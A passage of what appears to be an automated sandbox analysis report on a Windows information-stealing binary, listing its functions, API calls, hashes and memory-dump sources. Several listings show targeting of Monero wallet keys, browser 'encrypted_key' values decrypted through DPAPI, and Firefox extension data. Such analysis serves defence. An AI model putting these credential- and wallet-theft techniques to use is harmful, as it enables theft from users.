                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BED801
                              • lstrlen.KERNEL32(00000000), ref: 00BED99F
                              • lstrlen.KERNEL32(00000000), ref: 00BED9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00BEDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 29b053b1a918ff8abc2064c006dac675ae68806b3e244c8e33abf7266fbdaedb
                              • Instruction ID: bd95615a0989c3f4c6b142bf01339bd7fe202366fb83d3ba0ae2300bc4c8a92a
                              • Opcode Fuzzy Hash: 29b053b1a918ff8abc2064c006dac675ae68806b3e244c8e33abf7266fbdaedb
                              • Instruction Fuzzy Hash: 8A81BDB191010C9BDB18EBA4DC56DFE73B8AF14340F5485A9F60AB7091EF746A0DCB62
                              Function 00BEF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C01580,00C00D92), ref: 00BEF54C
                              • lstrlen.KERNEL32(00000000), ref: 00BEF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 0ae13e6753ea0b087c1678fdf07a1a9464c0836c1e0cd516d33392f96d2f782d
                              • Instruction ID: eca33bde6535c4470873d54e4e456c6c8bd132d2505820970f73e6dd970f7e47
                              • Opcode Fuzzy Hash: 0ae13e6753ea0b087c1678fdf07a1a9464c0836c1e0cd516d33392f96d2f782d
                              • Instruction Fuzzy Hash: 7F5111B1D0010DAADB08FBA4DC52DFDB3B8AF54340F408568F91A67195EF746A0DCBA2
                              Function 00BF3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 5e4724eac8ff119753571ae190c83ed5c208353b6ab682d324b9606fa3416c36
                              • Instruction ID: 3d0a1c9e631c58bb27763c0ef795e6dca17e7f28a2cb0c587efa3630d0beec9e
                              • Opcode Fuzzy Hash: 5e4724eac8ff119753571ae190c83ed5c208353b6ab682d324b9606fa3416c36
                              • Instruction Fuzzy Hash: 83413FB1D1410DABCB08EFA4D895AFEB7F8AB54704F148058E616B7290DB746A09CFA1
                              Function 00BE9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BE9D39
                                • Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
                                • Part of subcall function 00BE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
                                • Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
                                • Part of subcall function 00BE9AC0: LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F
                                • Part of subcall function 00BE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BE9B84
                                • Part of subcall function 00BE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BE9BA3
                                • Part of subcall function 00BE9B60: LocalFree.KERNEL32(?), ref: 00BE9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: a855459a615e256084c70a52f7b7092c2580fae88e9f249d89e7ab6c3226afad
                              • Instruction ID: f8ffe06396fa636e8a3e028cc004af9c2001d057037bce52085bdca011d081da
                              • Opcode Fuzzy Hash: a855459a615e256084c70a52f7b7092c2580fae88e9f249d89e7ab6c3226afad
                              • Instruction Fuzzy Hash: F43112B5D10219ABCF14DFE5DC85AEEB7F8EF48304F144569E905A7241E734DA08CBA1
                              Function 00BF92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00BF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00BF3AEE,?), ref: 00BF92FC
                              • GetFileSizeEx.KERNEL32(000000FF,00BF3AEE), ref: 00BF9319
                              • CloseHandle.KERNEL32(000000FF), ref: 00BF9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: b5700113505235d34fb31ccf1f131258a684f9bd90fe688188d47b67417393a8
                              • Instruction ID: 0eff473c34b7d8f7334fa30c7ff7e4c0c9e828dc28d13dcfb79b1a762e9303a4
                              • Opcode Fuzzy Hash: b5700113505235d34fb31ccf1f131258a684f9bd90fe688188d47b67417393a8
                              • Instruction Fuzzy Hash: 72F04F35E40208BFDB20DFB5DC49FAE77F9EB48710F10C2A4BA51A72C0D6B096058B44
                              Function 00BFC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 00BFC74E
                                • Part of subcall function 00BFBF9F: __amsg_exit.LIBCMT ref: 00BFBFAF
                              • __getptd.LIBCMT ref: 00BFC765
                              • __amsg_exit.LIBCMT ref: 00BFC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00BFC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 90b41280dae49e0e02b082cd3b1201284025ae6461d96d629c4af9f46b39af84
                              • Instruction ID: 8ef5549a9d804962c196f3fdba962e98aa1c1c87a03670b453ddaf8f4a8b7389
                              • Opcode Fuzzy Hash: 90b41280dae49e0e02b082cd3b1201284025ae6461d96d629c4af9f46b39af84
                              • Instruction Fuzzy Hash: F3F06D3290420C9BD725BBB89906B7D7BE0AF00720F2541C9F604AB1D2DB645D88DF5A
                              Function 00BF4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4F7A
                              • lstrcat.KERNEL32(?,00C01070), ref: 00BF4F97
                              • lstrcat.KERNEL32(?,009B89A8), ref: 00BF4FAB
                              • lstrcat.KERNEL32(?,00C01074), ref: 00BF4FBD
                                • Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF492C
                                • Part of subcall function 00BF4910: FindFirstFileA.KERNEL32(?,?), ref: 00BF4943
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
                                • Part of subcall function 00BF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
                                • Part of subcall function 00BF4910: FindClose.KERNEL32(000000FF), ref: 00BF4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 6b9d31f60ea50429d18f08a55b508ef0c73fc27d396513cf910e1079df16de05
                              • Instruction ID: c075f93ac17242b35815758337b4a01eaf4008b5737d928b4345dee1892586cd
                              • Opcode Fuzzy Hash: 6b9d31f60ea50429d18f08a55b508ef0c73fc27d396513cf910e1079df16de05
                              • Instruction Fuzzy Hash: 57216B769002086BC768FB70DC46EFE73BCAB55700F0445A4B659A7181EEB497CDCB92